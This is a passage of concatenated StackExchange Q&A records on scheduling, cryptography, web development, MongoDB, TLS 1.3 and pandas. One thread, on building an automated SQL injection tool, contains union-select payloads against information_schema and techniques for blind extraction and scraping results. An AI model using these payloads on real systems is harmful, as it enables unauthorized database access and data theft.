hours, etc.)\nI have tried to look for other things like Airflow, but i'm not really sure if it will integrate well with the Kubeflow environment.\nAnswer: That should be what a recurring run is for.\nThat would be using a run trigger, which does have a cron field, for specifying cron semantics for scheduling runs.\n","meta":{"source":"stackoverflow","title":"How to schedule jobs in Kubeflow?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can the data transfered from a PC to Dropbox or a USB drive be logged and detected?\n\nQuestion: I have some problems with my manager and am in process of using a lawyer to litigate with regards to workplace harassment. The litigation is planned to be \"soft\" and my lawyer only plans to send the employer an email saying that he has heard cases of workplace hostility from me according to which I am seeking a constructive dismissal and claiming a reasonable severance. I am concerned that the employer might react aggressively and retaliates by looking at the logs of my computer to see if it can accuse me of theft. \nI have transferred some of the files which I was working on (non are highly top secret - I am a designer) plus some personal files such a benefit claims and bank statements and pictures to Dropbox and a usb drive. I have deleted all my web browsing history. I have taken the files only to make my portfolio for future job searches, I had already discussed with my manager about how I can show case my work for future employers.\nCan they track if data was uploaded to drop box? Can they detect what data?\nSame question for USB key, I already know they can track the USB, but can they detect what files exactly, in other words can they accuse me for taking my music files?\nComment: How should be know if \"they\" can? But yes, if prepared beforehand, every mouseclick, keystroke, screen content etc. of you can be logged.\nAnswer: If you are using a computer provided by, controlled by or just even accessed by your employer (as almost everybody does at work), then the answer is yes, your employer could potentially log what you are doing.\nWhen they have full control over your computer there is no limit to what they could log - screenshots, keystrokes, network traffic, etc, etc - and there is no reasonable way for you to find out.\nHowever, if you are not working with something sensitive surrounded by high security, it might be unlikely that your employer has gone through the effort to log these things. What they are most likely to have is perhaps logs of your network traffic, e.g. your HTTP requests (but probably not bodys since they take a lot of space). In these filenames of files uploaded to dropbox might be found. (And yes, even if you used HTTPS your employer could get around that with an installed root certificate.)\nSo the answer is possibly, but you can not know for sure.\n","meta":{"source":"security.stackexchange","title":"Can the data transfered from a PC to Dropbox or a USB drive be logged and detected?","dup_signals":{}},"subset":"stackexchange"} +{"text":"SQL Injection - Extracting database data from the page content\n\nQuestion: I have a question I am hoping someone could help with..\nI am in the process of writing an SQL Injection tool from scratch (I am aware there are already excellent tools out there such as SQL Map, but this one has to be written from scratch).\nThe problem I am having:\nWhen manually performing SQL injection to determine tables names or column names and so on using strings such as:\n<code>www.vulnerable site.net\/articles.php?id =-1 union select 1,2,group_concat(column_name),4 from information_schema.columns --<\/code>\nor\n<code>www.vulnarable site.net\/articles.php?id =-1 union select 1,2,table_name,4 from information_schema.tables --<\/code>\nit is easy to determine the table names\/column names as you can simply look at the page and read the column names that are returned in the page content.\nBut how can this be done in an automated way?\nDoing this in an automated fashion is a lot harder though because how does the tool know what on the page that is returned when the sql injection is executed are table names\/column names?\nWhat would be the most reliable way to do this so the tool knows what parts of the page content to extract because they are table names\/column names?\nfor example... could I parse\/search the page content for strings seperated by commas to get the table and column names that are output by the injection? Is there better more reliable ways to do it?\nyour help with this is much appreciated, many thanks\nComment: Can you try using regular expressions? Even better, try comparing original HTML code to the resultant after the injected query and see what's different. Also, if the page is vulnerable to XSS, you can using JavaScript to make an AJAX request for the results and put them in a certain div\nAnswer: The easiest way is to use blind sql injection. You know if the question you are asking is right or wrong depending on how long the query takes to execute. This is also the most flexible approach because a blind sql injection exploit will work regardless of the type of sql injection being exploited (blind, non-blind, select, insert, update, delete....). \nAnother approach is to try and identify a visible field on the page while you brute force the number of columns. Once you find this location on the page, then you can scrape data from this point (sqlmap does something like this for non-blind injection):\n<code>www.vulnerable site.net\/articles.php?id =-1 union select 'dsjhfsjhfdf'\nwww.vulnerable site.net\/articles.php?id =-1 union select 'dsjhfsjhfdf','sfjufewjfef'\n...\n<\/code>\nThis will work well with MySQL but some database types like postgresql, the columns in the union select must be the same type. So the database will also have to be brute-forced.\nComment: @perl-user If its non-blind injection you should be able to pull out the value of an arbitrary column. One option is to use the concat() function to surround the data that you are pulling out with a unique value. Then just use a regex to pull out the data between the two unique values. Damn simple son, maybe you should actually try solving problems, then you'll be a better problem solver ;)\nComment: thanks, the concat_ws() function was what I required. I didn't realise it could be used in that way to effectively print a user defined string to the page as well as the database data, thanks for your help.\nComment: I agree with your point about blind sql injection being the best\/easiest way. However, in this instance I am concentrating on union based injection, so your second suggestion (scraping the data once you have found the location on the page and so on) is the kind of thing I am looking for. Could you explain this a little further as I am a little unsure as to exactly how that would work? thanks for your help\nComment: @perl-user Well finding the content on the page is a technically difficult approach. However, you can use a union select with blind sql injection. [Here is an exploit that i wrote](http:\/\/www.exploit-db.com\/exploits\/4547\/) which uses a a binary search with blind SQL Injection to pull out bytes using O(log(n)) requests. I use a union select with blind sql injection to find messages in the `bin_ask` subroutine. Its also multithreaded, which makes it very fast.\nComment: Very interesting, I will definately have a look at that, thanks. Could you also tell me a little more about how you said sqlmap does it for non-blind SQL injection please as that method is still something I'm interested in aswell, thanks a lot for your help\nAnswer: The easiest way is to access the page with legit input and with the injection and look at the difference. If you know what content is not results and know what the format of the expected result is, it isn't that hard to pick out the details with things like regular expressions or some other parsing engine. \nGranted, any other dynamic elements (such as advertisements) that can differ from page load to page load may present a problem that would require a more elaborate plan.\nComment: Can you think of any ways that would allow me to pinpoint exactly where the returned data is on the page... for example, the data will be exactly between this string and this string, so I can then scrape everything in between these two points? thanks for your help\nComment: @perl-user as long as the source of the page is consistent between page loads, you just load the page normally and then compare one to the other until you get to a spot where it differs. You can then save the offset. If the page content differs from one page load to another, it's going to be a lot trickier and would likely require some manual effort to identify the correct dynamic block of source.\n","meta":{"source":"security.stackexchange","title":"SQL Injection - Extracting database data from the page content","dup_signals":{}},"subset":"stackexchange"} +{"text":"Randomness in Elgamel\n\nQuestion: Suppose that, instead of choosing r completely at random in ElGamal public key encryption, a lazy encryptor (Alice) derives it by following r\u2032= 2r. Suppose also that Eve knows that Alice had encrypted the same message m with the two random numbers r and r\u2032= 2r, thus creating two ciphertexts {k, c} and {k\u2032, c\u2032}. Answer the following questions.\n(a) Show how Eve can derive the message m using the two ciphertexts and the public key provided by Alice. \nAnswer: Okay, so this really seems like an homework question to me, so I am going to try to help you with a hint instead of serving the answer hot on a plate. If my assumption about it being a homework question is wrong, then I apologise but the following hint will help you out anyway. \nUsually the cipher text in El Gamal is of the form $c=(c1,c2)$, where $c1 = g^{r}$ and $c2 = m.h^{r}$. Now, if $r' = 2r$, then we have $c'=(c1',c2')$ where $c2' = m.h^{2r}$. \nConsidering the above, what happens if we divide c2' by c2, i.e $\\frac{c2'}{c2}$. Would we be able to obtain some information from the this division operation that we just did. \nAnother way to think of this would be the fact that El Gamal is not IND-CCA secure as it is multiplicatively homomorphic in the presence of a decryption oracle. Maybe this answer will help you understand this property better. This property here will help us do the above division through which the attacker can obtain the value of $h^{r}$ and consequently the value of $m$. \nHope this helps! \nComment: If homework please don't write an answer, provide only hint on comments, that is [our current policy](https:\/\/crypto.meta.stackexchange.com\/questions\/1115\/do-we-want-to-update-the-way-we-handle-homework-questions\/1117#1117)\n","meta":{"source":"crypto.stackexchange","title":"Randomness in Elgamel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't send file via ajax ( print_r($_FILES); Array ( ) )\n\nQuestion: I'm trying to send file, it works with common form confirm, but don't with XHR.\nHere my HTML:\n<code><form action=\"ajax\/upload.php\" method=\"post\" name=\"form1\" enctype=\"multipart\/form-data\" id=\"id1\">\n <input type=\"file\" name=\"input1\">\n <input type=\"submit\" name=\"submit1\">\n<\/form> \n\n<form action=\"ajax\/upload.php\" method=\"post\" name=\"form2\" id=\"id2\">\n <input type=\"file\" name=\"input2\">\n <input type=\"submit\" name=\"submit2\">\n<\/form>\n<\/code>\nJS: \n<code>document.querySelector('#id2').onsubmit = function(e) {\n e.preventDefault();\n var file = document.querySelector('#id2 input[type=\"file\"]').files[0];\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", \"ajax\/upload.php\", true);\n var boundary = String(Math.random()).slice(2);\n xhr.setRequestHeader('Content-Type', 'multipart\/form-data; boundary=' + boundary);\n xhr.send(file);\n} \n<\/code>\nPHP: \n<code>echo '<pre>';\nvar_dump($_REQUEST);\necho 'print_r($_FILES); <br>';\necho 'Result: <br><br>';\nprint_r($_FILES);\nprint \"<\/pre>\";\n<\/code>\nI send same file, responses for common submit: \n<code>array(1) {\n [\"submit1\"]=>\n string(31) \"\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0437\u0430\u043f\u0440\u043e\u0441\"\n}\nprint_r($_FILES); \nResult: \n\nArray\n(\n [input1] => Array\n (\n [name] => CRC75.otf\n [type] => application\/vnd.oasis.opendocument.formula-template\n [tmp_name] => \/tmp\/phpbNWcgk\n [error] => 0\n [size] => 411456\n )\n\n)\n<\/code>\nFor AJAX:\n<code>array(0) {\n}\nprint_r($_FILES); \nResult: \n\nArray\n( \n)\n<\/code>\nI can't understand why, file attached exist: \n<code>document.querySelector('#id2 input[type=\"file\"]').files[0]\nFile { name: \"CRC75.otf\", lastModified: 1529516347000, webkitRelativePath: \"\", size: 411456, type: \"application\/vnd.oasis.opendocument.formula-template\" } \n<\/code>\nHeaders of AJAX request looks normal\n<code>Accept: *\/*\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en;q=0.5\nConnection: keep-alive\nContent-Length: 411456\nContent-Type: multipart\/form-data; boundary=44316423440108066\nHost: localhost\nReferer: http:\/\/localhost\/\nUser-Agent: Mozilla\/5.0 (X11; Ubuntu; Linu\u2026) Gecko\/20100101 Firefox\/61.0 \n<\/code>\nP.S.: It's the requirement that I cannot send a <code>POST<\/code> request.\nAnswer: You can't send a <code>File<\/code> directly in the <code>send()<\/code> parameter, you need to use a <code>FormData<\/code> object.\n<code>document.querySelector('#id2').onsubmit = function(e) {\n e.preventDefault();\n var formdata = new FormData;\n var file = document.querySelector('#id2 input[type=\"file\"]').files[0];\n formdata.append(\"input2\", file);\n formdata.append(\"submit2\", \"\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0437\u0430\u043f\u0440\u043e\u0441\");\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", \"ajax\/upload.php\", true);\n xhr.send(formdata);\n} \n<\/code>\nDon't use <code>xhr.setRequestHeader()<\/code> to set the <code>Content-type<\/code> header. This is done automatically by the browser. If you do it yourself, the boundary you specify won't match what it's actually sending.\nComment: Still same result\n`var file = document.querySelector('#id2 input[type=\"file\"]').files[0]; \nvar formData = new FormData(); \nformData.append('File', file); \nxhr.send(formData); `\nComment: What are you trying to ask?\nComment: I send FormData object, but it still response as before.\n","meta":{"source":"stackoverflow","title":"Can't send file via ajax ( print_r($_FILES); Array ( ) )","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get text input without textbox\n\nQuestion: I want to create a in\/out dashboard at the front door with a computer & wall-mounted TV running full screen with no keyboard\/mouse, just a barcode scanner for input. Asp.net mvc dashboard app will display list of all currently present employees for receptionist. To display user list, if I had a textbox & 'Submit' button this would be easy. For design & COVID reasons, I want computer to be alway waiting for input from barcode scanner without any prompts\/textboxes. I just want employee to walk up to terminal and scan themselves upon entry\/exit. Does this make sense? I am at the design stage of this project and can't figure out how to get text input without traditional texbox\/submit method. Thanks.\nComment: hi kaoskev, sounds like an interesting project. I think your question might be a bit too broad, but yes, I believe it makes sense. I don't think you'll get a better answer than the one provided by @paulsm4.\nAnswer: Sure it makes sense.\nJust:\n\nFind a library that supports your Barcode scanner\nWrite the code that reads the scanner, and looks up the corresponding name (e.g. from a database)\nWrite the code that updates the list with the new name.\nYou'll probably also want to give the receptionist the ability to delete names from the list - or manually enter names that can't be scanned.\n\nADDENDUM:\n\nno keyboard\/mouse, just a barcode scanner for input ... I just want\nemployee to walk up to terminal and scan themselves upon entry\/exit...\n\nThis part might be challenging, for a couple reasons:\n\nIt would be nice if there was enough of a UI that the employee could click \"start scanning\" (e.g. with a button)\n\nIt's unclear if simply reading what's encoded in the bar code is sufficient. Often, a bar code contains minimal information (e.g. \"User ID\"), and you need to do additional processing (e.g. \"Look up username from ID in a database).\n\nHOWEVER ...\nLook here:\nBarcode scanner sample\nThis article discusses how to use DeviceWatcher, ClaimScannerAsync() and friends to receive scanner data asynchronously.\nSee also Obtain and understand barcode data.\nMuch of this seems to be UWP-specific - I'm not sure it'll necessarily all work for you.\nYou might also want to consider having a keyboard or mouse ... but \"locking down\" the PC into \"kiosk mode\". For example:\nhttps:\/\/learn.microsoft.com\/en-us\/windows\/configuration\/lock-down-windows-10-applocker\nComment: Thanks for the quick reply. I am not asking 'how do I use a barcode scanner\" because they act like keyboards, that's easy. My problem is more 'How do I get user data without having a textbox that needs to be displayed and needs to be infocus to accept input?' -thanks again.\nComment: I think you're putting the horse before the cart. No, you DON'T need a \"keyboard\" (or equivalent) to \"accept input\". And you certainly don't need a \"text box\". Q: How are you connecting your reader to the PC (I'm guessing USB port)? Q: Is the data encoded in the bar code \"complete\" (e.g. the full name you want to display), or is a \"lookup\" required (e.g. lookup the user name in the database, from the ID encoded in the bar code)? Q: Are you providing any kind of \"user interface\" to the user (e.g. a button to \"start reading\")?\nComment: Please consider answering the above questions by updating your post, and I'd be happy to try updating my reply. Also please look here, and see if it gives you any good ideas: [Barcode scanner sample](https:\/\/learn.microsoft.com\/en-us\/samples\/microsoft\/windows-universal-samples\/barcodescanner\/)\nAnswer: Here's what I managed:\nhttps:\/\/jsfiddle.net\/s2ryogxt\/\n<code>$(document).ready(() => {\n const input = document.getElementById(\"myInput\");\n\n input.style.position = \"absolute\";\n input.style.top = \"-100px\";\n input.focus(); \/\/ on DOM ready\n\n let timeout = null;\n input.addEventListener('keyup', () => {\n if (timeout) {\n clearTimeout(timeout);\n }\n timeout = setTimeout(() => {\n if(input.value) {\n alert(`I got ${input.value}`);\n input.value = \"\";\n }\n input.focus();\n }, 100);\n });\n});\n<\/code>\nThis is all JavaScript, you can replace the alert with your own call to the endpoint. Just make sure the field is always in focus, and you should be alright.\n","meta":{"source":"stackoverflow","title":"Get text input without textbox","dup_signals":{}},"subset":"stackexchange"} +{"text":"Returning a function with callback as input without inputting one at beginning\n\nQuestion: I am currently reading some codebase but I meet some code I can't understand at all.\n<code>const asyncMapper = (name, done) => (payload, cb) => {\n post(name, {...payload}, (...params) => {\n if(isFunction(done))\n done(cb, ...params)\n else\n cb(...params)\n })\n}\n<\/code>\nThe asyncMapper function will accept a variable <code>name<\/code> and <code>done<\/code> which is (hopefully) a function as input. It will return another function with <code>payload<\/code> and a callback function <code>cb<\/code> as input.\nWhile I understand payload may come from somewhere like the action\/reducer, where can the callback function come from. There is no way to input one anyway. (so for the <code>...params<\/code>)\nComment: payload and cb are *arguments to the returned function*, so they're supplied by the caller. The gathered params array is from what is fed to the anonymous callback by post. What does this have to do with React anyway?\nAnswer: I'm going to reformat that code a little bit to make the separation of its components a little easier to understand.\n<code>const asyncMapper = (name, done) => \n (payload, cb) => {\n post(\n name,\n {...payload},\n (...params) => {\n if(isFunction(done))\n done(cb, ...params);\n else\n cb(...params);\n }\n )\n }\n<\/code>\nEssentially, passing in <code>name<\/code> and <code>done<\/code> values generate a function that uses those values. That generated function takes a <code>payload<\/code> and a <code>cb<\/code> (callback). It calls the <code>post<\/code> function (though I'm not sure where this comes from), passing in the <code>name<\/code>, the <code>payload<\/code> object with <code>{...payload}<\/code>, and ANOTHER generated function with no declared parameters. The use of <code>...params<\/code> means that whatever parameters passed into this function can be passed into any functions called in its scope.\nThis generated function uses the <code>isFunction<\/code> function (also not sure where this comes from) using the <code>done<\/code> function. If <code>isFunction(done)<\/code> returns true, it calls the <code>done<\/code> function, passing it the <code>cb<\/code> function and whatever parameters were sent to this generated function. If <code>isFunction(done)<\/code> returns false, it calls the <code>cb<\/code> function, passing in whatever params were sent to this generated function.\nIn use, assuming you've already defined <code>name<\/code>, <code>done<\/code>, <code>payload<\/code>, and <code>cb<\/code> values, it would look something like this:\n<code>const generated = asyncMapper(name, done); \/\/ Generate the function\n\ngenerated(payload, cb); \/\/ Call the generated function\n<\/code>\nThe rest of the functionality depends on the <code>isFunction<\/code> and <code>post<\/code> functions.\nAnswer: <code>const asyncMapper = (name, done) => (payload, cb) => {\n post(name, {...payload}, (...params) => {\n if(isFunction(done))\n done(cb, ...params)\n else\n cb(...params)\n })\n}\n<\/code>\nCan be understood as below:\n<code>var asyncMapper = function asyncMapper(name, done) {\n return function (payload, cb) {\n post(name, { ...payload\n }, function () {\n for (var _len = arguments.length, params = new Array(_len), _key = 0; _key < _len; _key++) {\n params[_key] = arguments[_key];\n }\n\n if (isFunction(done)) done.apply(void 0, [cb].concat(params));else cb.apply(void 0, params);\n });\n };\n};\n<\/code>\n","meta":{"source":"stackoverflow","title":"Returning a function with callback as input without inputting one at beginning","dup_signals":{}},"subset":"stackexchange"} +{"text":"Abstract class in Java with global variables aren't setting?\n\nQuestion: I've got 2 classes setup, both extending a Module class. I'm trying to set 2 integers in one of them and using 2 integers in the other.\nHowever when I execute everything, it does get set (I know because of debugging) but when the method for 'printing' runs, it's still 0.\nI don't know what I'm doing wrong though.\nModule Class:\n<code>public abstract class Module {\n protected int min, max;\n}\n<\/code>\nFoo1:\n<code>public class Foo1 extends Module {\n public void setMinMax(){\n min = 2;\n max = 5;\n }\n}\n<\/code>\nFoo2:\n<code>public class Foo2 extends Module {\n public void printMinMax(){\n System.out.print(\"Min: \" + min + \" Max: \" + max);\n }\n}\n<\/code>\nComment: What do you mean by \"global variables\"? In your code It is natural that `setMinMax()` won't affect `printMinMax()` because no single instance can have both of the methods because they are in separate classes.\nComment: The problem is your understanding of java \/ oop\nAnswer: You have 2 instances of 2 different classes. One instance of a <code>Foo1<\/code>, with its own <code>min<\/code>\/<code>max<\/code>, and one instance of a <code>Foo2<\/code>, again with its own <code>min<\/code>\/<code>max<\/code>.\nNote that your <code>Foo<\/code> class provides the fields, and each time you instantiate a derived instance (of <code>Foo1<\/code> or <code>Foo2<\/code>), you'll get a new class with a new set of fields (including those derived from the base class)\nAnswer: When you set one instance, it has no effect on another instance. Each instance has it's own fields. Most likely what you imagined was\n<code>public abstract class Module {\n protected static int min, max;\n}\n<\/code>\nThis way the fields will be shared between all instances of <code>Module<\/code>. You should only set these field from a static method, ideally on <code>Module<\/code>\nHowever, I would avoid doing this, or using mutable static fields whenever possible.\n","meta":{"source":"stackoverflow","title":"Abstract class in Java with global variables aren't setting?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't connect MongoDb on AWS EC2 using python\n\nQuestion: I have installed Mongodb 3.0 using this tutorial -\nhttps:\/\/docs.mongodb.com\/v3.0\/tutorial\/install-mongodb-on-amazon\/\nIt has installed fine. I have also given permissions to 'ec2-user' to all the data and log folders ie var\/lib\/mongo and var\/log\/mongodb but and have set <code>conf<\/code> file as well.\nNow thing is that mongodb server always fails to start with command \n<code>sudo service mongod start\n<\/code>\nit just say <code>failed<\/code>, nothing else.\nWhile if I run command -\n<code>mongod --dbpath var\/lib\/mongo\n<\/code>\nit starts the mongodb server correctly (though I have mentioned same dbpath in <code>.conf<\/code> file as well)\nWhat is it I am doing wrong here?\nAnswer: When you run <code>sudo mongod<\/code> it does not load a config file at all, it literally starts with the compiled in defaults - port 27017, database path of \/data\/db etc. - that is why you got the error about not being able to find that folder. The \"Ubuntu default\" is only used when you point it at the config file (if you start using the service command, this is done for you behind the scenes).\nNext you ran it like this:\n<code>sudo mongod -f \/etc\/mongodb.conf\n<\/code>\nIf there weren't problems before, then there will be now - you have run the process, with your normal config (pointing at your usual dbpath and log) as the root user. That means that there are going to now be a number of files in that normal MongoDB folder with the user:group of <code>root:root<\/code>. \nThis will cause errors when you try to start it as a normal service again, because the mongodb user (which the service will attempt to run as) will not have permission to access those <code>root:root<\/code> files, and most notably, it will probably not be able to write to the log file to give you any information. \nTherefore, to run it as a normal service, we need to fix those permissions. First, make sure MongoDB is not currently running as root, then:\n<code>cd \/var\/log\/mongodb\nsudo chown -R mongodb:mongodb .\ncd \/var\/lib\/mongodb\nsudo chown -R mongodb:mongodb .\n<\/code>\nThat should fix it up (assuming the user:group is <code>mongodb:mongodb<\/code>), though it's probably best to verify with an <code>ls -al<\/code> or similar to be sure. Once this is done you should be able to get the service to start successfully again.\nIf you're starting mongod as a service using:\n<code>sudo service mongod start\n<\/code>\nMake sure the directories defined for logpath, dbpath, and pidfilepath in your mongod.conf exist and are owned by mongod:mongod.\nComment: Well, I am reading the same answer http:\/\/stackoverflow.com\/a\/12232668\/609782\nWhat I didn't understand is, my service name is `mongod` and I am logged in as `ec2-user`, so while doing `chown` what should be my `user:group`? it is definitely not mongodb:mongodb, is it?\nComment: Do ls -al and check what is the user group and change the permission accordingly.\nComment: need to call `ls -al` on which folder? (or it doesn't matter?) as when I did that on root directory, i got a list with different user:groups\nComment: \/etc\/mongodb folder\n","meta":{"source":"stackoverflow","title":"Can't connect MongoDb on AWS EC2 using python","dup_signals":{}},"subset":"stackexchange"} +{"text":"How does TLS 1.3 provide authentication without using the public key to verify that the server has a private key?\n\nQuestion: In the TLS 1.2 handshake, after checking the certificate, the public key from the certificate was used to encrypt the data to create a symmetric encryption key, hence the authentication took place on the factor of knowing the private key, as it is needed to decrypt that data.\nIn TLS 1.3, the public key cannot be used to encrypt data needed to create a symmetric encryption key because this data is included in the first message sent by the client and the client cannot know the public key until it receives the certificate that the server sends in response to the first message.\nSince the public key is not used to encrypt data needed to generate a symmetric encryption key or any other data the private key knowledge factor disappears.\nHow does TLS 1.3 provide authentication and what is the point of using PKI and Public Key Certificate if the public key is not used to verify that the party has a private key?\nAnswer: \n... the public key from the certificate was used to encrypt the data to create a symmetric encryption key, hence the authentication took place on the factor of knowing the private key, as it is needed to decrypt that data.\n\nThis was not the authentication. What you describe is the RSA key exchange, which was removed in TLS 1.3 and is even considered obsolete with TLS 1.2.\nThe proof that the server knows the private key is instead done with the CertificateVerify message, which is (slightly simplified) a signature (using the private key) over the messages previously send in the handshake. This means it also includes client side random data and thus can not be simply replayed within another handshake.\nComment: @\u5085\u7ee7\u6657: For DH key exchange it is done by digitally signing parts of the ServerKeyExchange.\nComment: The party whose authenticity is being verified sends:\n* Certificate - the party's certificate chain.\n* CertificateVerify - a digital signature made with a private key based on a [Transcript-Hash(Handshake Context, Certificate)](https:\/\/datatracker.ietf.org\/doc\/html\/rfc8446#section-4.4.1) and the algorithm by which this digital signature is made.\n\nThen, the other party verifies the certificate chain and uses the public key from the certificate to verify the electronic signature from CertificateVerify, right?\nComment: @NikitaKhodakovsky: correct. Although it does not matters if the signature in CertificateVerify is verified first or the certificate + chain. Probably the latter is done only after validating the signature since certificate validation is more expensive, especially if revocation is properly accounted for.\nComment: So what is the proof that the server knows the private key in TLS 1.2?\nComment: @SteffenUllrich Thank you so much. I've been reading RFC documents and, as you mentioned, I found that the phases of verifying the server's private key are completely different. In addition, in TLS 1.2, the data to be signed includes only the Diffie-Hellman parameters, while in TLS 1.3, it includes all the content of the entire handshake phase. This difference is significant, and surprisingly, there are very few online articles that mention it, which is also a point that confuses me.\nAnswer: The key exchange in TLS 1.3 is mainly based on the SIGMA protocol, implementing a \"SIGn-then-MAc\" variant of SIGMA. I will only describe high-level ideas for the full handshake, other considerations are needed for other handshake like the PSK mode. For an extensive security analysis, I recommend \"A cryptographic analysis of TLS 1.3 handshake protocol\" by Dowling, Fischlin, G\u00fcnther and Stebila.\n\nHow does TLS 1.3 provide authentication\n\nZooming out of TLS 1.3, SIGMA builds on an unauthenticated DH and authentication in SIGMA is guaranteed by signature over the communication transcript of the key exchange and a MAC over the identity of the authenticating party. The basic SIGMA flow with mutual authentication between a Client C and Server S is as follows:\n\nC -> S: $g^x, \\text{identity(C)}$.\nS -> C: $g^y, \\mathrm{sig}(sk_S, g^x, g^y), MAC(identity(S))$\nC -> S: $\\mathrm{sig}(sk_C, g^x, g^y)$\n\nSIGMA is shown (here for example) to provide strong authentication guarantees, key secrecy and forward secrecy even assuming a strong attacker; i.e.: an attacker that fully control the network, that can reveal established session keys, compromise the long-term signing keys of some entities. As a consequence, TLS 1.3 inherits those guarantees, though it makes a few changes like deriving the keys with a more complex key schedule that incorporate the entire transcript in the key schedule.\n\nwhat is the point of using PKI and Public Key Certificate if the public key is not used to verify that the party has a private key?\n\nFirstly, as seen in the SIGMA flow. The public keys are used to provide signature during authentication. Additionally, a PKI serves as a trusted way to bind identities to public key. This is necessary since a malicious party can impersonate another without any ground truth regarding identities and public keys.\nNote that, technically, SIGMA doesn't take maliciously generated public keys into it's threat model. But this is another issue.\n","meta":{"source":"crypto.stackexchange","title":"How does TLS 1.3 provide authentication without using the public key to verify that the server has a private key?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is there a way to filter out rows from a table with an unnamed column\n\nQuestion: I'm currently trying to do analysis of rolling correlations of a dataset with four compared values but only need the output of rows containing 'a'\nI got my data frame by using the command <code>newdf = df.rolling(3).corr()<\/code>\nSample input (random numbers)\n<code> a b c d \n1 a\n1 b\n1 c\n1 d\n2 a\n2 b\n2 c\n2 d\n3 a \n3 b 5 6 3\n3 c 4 3 1 \n3 d 3 4 2\n4 a 1 3 5 6 \n4 b 6 2 4 1 \n4 c 8 6 6 7 \n4 d 2 5 4 6 \n5 a 2 5 4 1 \n5 b 1 4 6 3\n5 c 2 6 3 7\n5 d 3 6 3 7\n<\/code>\nand need the output\n<code> a b c d\n1 a 1 3 5 6\n2 a 2 5 4 1\n<\/code>\nI've tried filtering it by doing <code>adf = newdf.filter(['a'], axis=0)<\/code> however that gets rid of everything and when doing it for the other axis it filters by column. Unfortunately the column containing the rows with values: a, b, c, d is unnamed so I cant filter that column individually. This wouldn't be an issue however if its possible to flip the rows and columns with the values being listed by index to get the desired output.\nAnswer: Try using <code>loc<\/code>. Put the column of <code>abcdabcd ...<\/code> as index and just use <code>loc<\/code>\n<code>df.loc['a']\n\n<\/code>\nComment: I tried to do that but but the column of abcdabcd has no column name so I don't know how to assign it\nAnswer: The actual source of problem in your case is that your DataFrame\nhas a MultiIndex.\nSo when you attempt to execute <code>newdf.filter(['a'], axis=0)<\/code> you want\nto leave rows with the index containing only \"a\" string.\nBut since your DataFrame has a MultiIndex, each row with \"a\" at\nlevel 1 contains also some number at level 0.\nTo get your intended result, run:\n<code>newdf.filter(like='a', axis=0)\n<\/code>\nmaybe followed by .dropna().\nAn alterantive solution is:\n<code>newdf.xs('a', level=1, drop_level=False)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Is there a way to filter out rows from a table with an unnamed column","dup_signals":{}},"subset":"stackexchange"} +{"text":"FileBrowser which shows files from different directories using python QtGUI\n\nQuestion: I have full path of some pdf files which are in different directories and I want to show those files in one Window from where user can click and open them by and document viewer.\nSince I'm new to python and QtGUI, I am unable to figure out how to do this. Here is something that i had seen but unable to figure out how it is happening. When I run it, shows folder hierarchy , but instead of that i just want to show files of which i have complete path.\nThanks in advance.\nAnswer: This code was working for me \n<code>import subprocess\nimport os\nimport sys\nfiles = ['\/home\/test\/kelvin\/refresh.html','\/home\/test\/kelvin\/thread.html']\nprint list(enumerate(files))\nno=raw_input(\"enter the file no\\n\")\nno1 = int(no)\nif sys.platform == 'linux2':\n subprocess.call([\"xdg-open\", files[no1]])\nelse\n os.startfile(files[no1])\n<\/code>\nComment: Thanks kelvin, xdg-open solved my problem.Initially I wanted to make a window to display files in separately , but since I have the the file path I can open them with \"xdg-open\"\n","meta":{"source":"stackoverflow","title":"FileBrowser which shows files from different directories using python QtGUI","dup_signals":{}},"subset":"stackexchange"} +{"text":"Luby-Rackoff theorem for Generalized Feistel\n\nQuestion: I was reading about Luby-Rackoff theorem from various sources: [1], [2], [3], which says you need at least 3 rounds of a $2$-branch Feistel network to get a PRP if the underlying $f$ function is a PRF. I also came to know about the Generalized Feistel Network which has more than two branches.\nWhat will be the minimum number of rounds to get a PRP from a generalized $n~(>2)$ branch Feistel network, given the underlying function $f$ is a PRF?\nComment: Ah, OK, I think I'm starting to see the idea of the question now. It asks for the number of rounds as a function of $n$, given that the PRF is theoretically secure. Thanks, I'll remove the other comments.\nAnswer: As you probably saw in the reference linked, there are multiple types of \"basic\" generalized Feistel networks: Type-1, Type-2 and Type-3. As far as I can tell all of these were introduced at CRYPTO'89 by Zheng, Matsumoto, and Imai in \"On the Construction of Block Ciphers Provably Secure and Not Relying on Any Unproved Hypotheses\".\nSuppose that your state is split into $k$ blocks, then the above paper does in fact prove \/ claim security for these generalized Feistel constructions (with each and every PRF used in all rounds and all state parts of each round being independent):\n\nFor Type-1, security is proven for $2k-1$ rounds\nFor Type-2, security is proven for $k+1$ rounds\nFor Type-3, security is proven for $k+1$ rounds\n\nThe paper also proves \/ claims that these numbers of rounds are actually minimal.\nFor everbody's reference, here are the three basic types as a fancy graphic: \nimage source\nAs one can somewhat clearly see, the first two types are \"special cases\" of the third where a certain selections of PRF invocations and XORings is dropped. The paper does provide further analysis on the number of rounds to keep security when dropping these with certain patterns\n","meta":{"source":"crypto.stackexchange","title":"Luby-Rackoff theorem for Generalized Feistel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Thinking of new way of building a db page populating data via api calls - are there any issues doing it this way\n\nQuestion: Up to know, for DB driven web sites, I've used php (and CodeIgniter) to populate the data within the page prior to rendering, what I'm thinking about doing now is to develop a javascript (via jquery) page, make it as interactive as possible and then connect to the db through ajax\/json calls - so NO data populated to the screen prior to rendering. \nWHY? sort of an idea that I can, some day, hook the same web page to different data sources - a true separation of page from data - linking only via ajax.\nI think the biggest issue could be performance...are there other things to watch out for? What's the best approach to handling security (stateless\/sessionless)?\nAnswer: Definitely something I've considered doing but you'd probably want to develop some kind of framework (or see if someone already has) if you're going to do this. Brute forcing this kind of thing will lead to a lot of redundant code and unnecessary hair loss. Perhaps a jQuery plugin? I'd be very interested to see what you came up with.\nAnswer: The biggest question is accessibility. What about those people using screenreaders, for which Javascript 